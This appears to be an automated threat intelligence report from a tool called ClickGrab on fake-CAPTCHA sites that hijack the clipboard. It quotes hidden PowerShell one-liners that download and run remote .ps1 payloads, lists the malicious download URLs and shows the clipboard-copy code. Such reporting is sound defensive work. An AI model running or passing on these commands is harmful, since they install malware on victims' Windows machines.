Threat Intelligence Report
Attack Pattern Analysis
Top Indicators/Keywords
Malicious Sites Detected
Click on a site to view detailed analysis💻 PowerShell Commands 2
🔍 Suspicious Keywords 8
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 2
🔍 Suspicious Keywords 7
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 7
🌐 Extracted URLs 5
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
💻 PowerShell Commands 1
🔍 Suspicious Keywords 8
🌐 Extracted URLs 3
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
🔍 Suspicious Keywords 6
🌐 Extracted URLs 4
📋 Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
🔍 Suspicious Keywords 7
🌐 Extracted URLs 46
📋 Clipboard Manipulation Code
Showing first 1 of 1 entries (truncated for performance)
...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...
🔍 Suspicious Keywords 4
🌐 Extracted URLs 15
🔍 Suspicious Keywords 2
🌐 Extracted URLs 1
Technical Analysis
ClickGrab Threat Analysis Report - 2025-06-07
Generated on 2025-06-17 08:08:43
Executive Summary
- Total sites analyzed: 31
- Sites with malicious content: 18
- Unique domains encountered: 29
- Total URLs extracted: 141
- PowerShell download attempts: 20
- Clipboard manipulation instances: 34
Domain Analysis
Most Frequently Encountered Domains
- www.google.com: 29 occurrences
- use.fontawesome.com: 17 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- cdnjs.cloudflare.com: 13 occurrences
- www.webgo.de: 10 occurrences
- draft.blogger.com: 9 occurrences
- t.me: 7 occurrences
- www.w3.org: 6 occurrences
- browser.certif-update.website: 4 occurrences
- svetvip.ru: 4 occurrences
- www.blogger.com: 4 occurrences
- api.whatsapp.com: 3 occurrences
- mc.yandex.ru: 2 occurrences
- www.blogblog.com: 2 occurrences
- www.offset.com: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
17 occurrences across 1 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
(17 times)
Font resources
30 occurrences across 2 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css
(17 times)https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
(13 times)
CDN hosted scripts
14 occurrences across 2 distinct URLs
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
(13 times)https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
(1 times)
Google resources
31 occurrences across 9 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
(17 times)https://www.google.com/intl/en/policies/privacy/
(4 times)https://www.google.com/intl/en/policies/terms/
(4 times)https://www.google.com
(1 times)http://www.google.com/2005/gml/b
(1 times)- ...and 4 more distinct URLs
Clipboard Manipulation Analysis
Detected clipboard manipulation in 34 instances.
Document.Execcommand Copy
Found in 34 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
Textarea Manipulation
Found in 34 snippets (100.0% of clipboard code)
Attack Pattern Reconstruction
Malicious Command Analysis
Identified 4 malicious command preparations.
Command 1:
powershell
Context:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Command 2:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Command 3:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Command 4:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Malicious Download Sources
https://aatox.com/verify/45.ps1
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
https://yogasitesdev.wpengine.com/2/15.ps1
Key Findings
- Prevalence: 58.1% of analyzed sites contained malicious content
- Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
- Target Platform: Windows systems via PowerShell execution
- Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA
Recommendations
- User Education: Warn users about fake CAPTCHA verification schemes
- Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
- URL Filtering: Block known malicious domains identified in this analysis
- PowerShell Execution Policy: Restrict PowerShell execution in corporate environments